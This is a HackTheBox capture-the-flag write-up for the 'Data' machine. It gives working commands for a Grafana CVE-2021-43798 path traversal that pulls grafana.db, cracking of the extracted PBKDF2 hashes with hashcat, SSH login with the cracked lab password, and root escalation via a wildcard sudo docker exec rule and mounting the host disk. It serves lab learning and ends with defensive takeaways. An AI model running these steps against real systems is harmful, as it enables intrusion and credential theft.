HackTheBox - Data

Updated 29-03-2026
#htb #hackthebox #ctf #writeup #linux #hashcat

A Linux machine where a path traversal in a popular metrics platform leaks its own database — and a misconfigured container environment offers an unconventional route to the underlying host.

Tools

  • sqlite3
  • grafana2hashcat
  • hashcat

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p22,3000 10.129.3.91         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-02-12 14:57 EST
Nmap scan report for 10.129.3.91
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 63:47:0a:81:ad:0f:78:07:46:4b:15:52:4a:4d:1e:39 (RSA)
|   256 7d:a9:ac:fa:01:e8:dd:09:90:40:48:ec:dd:f3:08:be (ECDSA)
|_  256 91:33:2d:1a:81:87:1a:84:d3:b9:0b:23:23:3d:19:4b (ED25519)
3000/tcp open  ppp?
|     Location: /login

Foothold

Accessing http://10.129.3.91:3000/ redirects to the Grafana login page.
The footer reveals the application is running Grafana v8.0.0.

Grafana v8.0.0 is vulnerable to CVE-2021-43798, a directory traversal vulnerability that allows unauthenticated file disclosure via plugin paths.
This vulnerability permits traversal outside the /public/plugins/ directory, enabling arbitrary file reads.

Since the vulnerability allows arbitrary file disclosure, the Grafana SQLite database located at /var/lib/grafana/grafana.db can be retrieved using path traversal.

1
$ curl --path-as-is http://10.129.3.91:3000/public/plugins/welcome/../../../../../../../../var/lib/grafana/grafana.db -o grafana.db

Using sqlite3, the contents of the database can be inspected to extract credentials and other sensitive data.

1
2
3
4
5
6
7
$ sqlite3 grafana.db  
sqlite> .tables
<-SNIP->
sqlite> select * from user;
sqlite> select login, password, salt from user;
admin|7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S
boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl

The user table stores password hashes and salts for two users: admin and boris.

Grafana hash digests are not in a format directly supported by common password cracking tools.
It uses PBKDF2-HMAC-SHA256 with 10,000 iterations, storing hashes in hexadecimal format and salts in plaintext.

The hashes are converted to Hashcat format using the grafana2hashcat tool.

1
sha256:NumberOfIterations:Base64EncodedSalt:Base64EncodedDigest

then use the tool to convert the hashes and decrypt them with hashcat

1
2
$ python3 grafana2hashcat.py ../hashes.txt -o grafana_hashes.txt

1
2
3
$ hashcat -m 10900 grafana_hashes.txt --wordlist /usr/share/wordlists/rockyou.txt 

sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1

The hash for boris is successfully cracked, revealing valid credentials: boris:beautiful1.
These credentials allow authentication via SSH.

1
2
3
$ ssh boris@10.129.3.91           

boris@data:~$ cat user.txt

Privilege Escalation

Checking sudo permissions:

1
2
3
4
5
6
boris@data:~$ sudo -l
Matching Defaults entries for boris on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *

The wildcard allows arbitrary arguments to be supplied to docker exec.

Inspecting running processes reveals the container ID.

1
2
3
4
$ ps aux | grep docker
<-SNIP->
root      1614  0.0  0.4 711456  9148 ?        Sl   19:39   0:01 /snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock
<-SNIP->

the container ID can be extracted from the containerd-shim-runc-v2 process

1
/snap/docker/1125/bin/containerd-shim-runc-v2 -namespace moby -id e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 -address /run/snap.docker/containerd/containerd.sock

Using the -u 0 flag spawns a root shell inside the container.

1
$ sudo /snap/bin/docker exec -u 0 -it e6ff5b1cbc85 bash

The presence of /dev/sda inside the container indicates the container was started with device exposure

1
2
3
4
5
6
bash-5.1# ls -lah /dev
<-SNIPPED->
brw-rw----    1 root     disk        8,   0 Feb 12 19:39 sda
brw-rw----    1 root     disk        8,   1 Feb 12 19:39 sda1
brw-rw----    1 root     disk        8,   2 Feb 12 19:39 sda2
<-SNIPPED->

Mounting /dev/sda1 provides direct access to the host filesystem.
From there, the root flag can be retrieved at /mnt/host/root/root.txt.

1
2
3
4
5
6
bash-5.1# mkdir /mnt/host
bash-5.1# mount /dev/sda1 /mnt/host
bash-5.1# ls -lah /mnt/host
<-SNIP->
drwx------    7 root     root        4.0K Feb 12 19:39 root
<-SNIP->

Key Takeaways

  • CVE-2021-43798 enables unauthenticated arbitrary file disclosure in vulnerable Grafana versions.
  • Grafana stores credentials in SQLite using PBKDF2-HMAC-SHA256.
  • Granting docker exec via sudo with a wildcard introduces privilege escalation risk.
  • Exposing host block devices inside containers can result in full host compromise.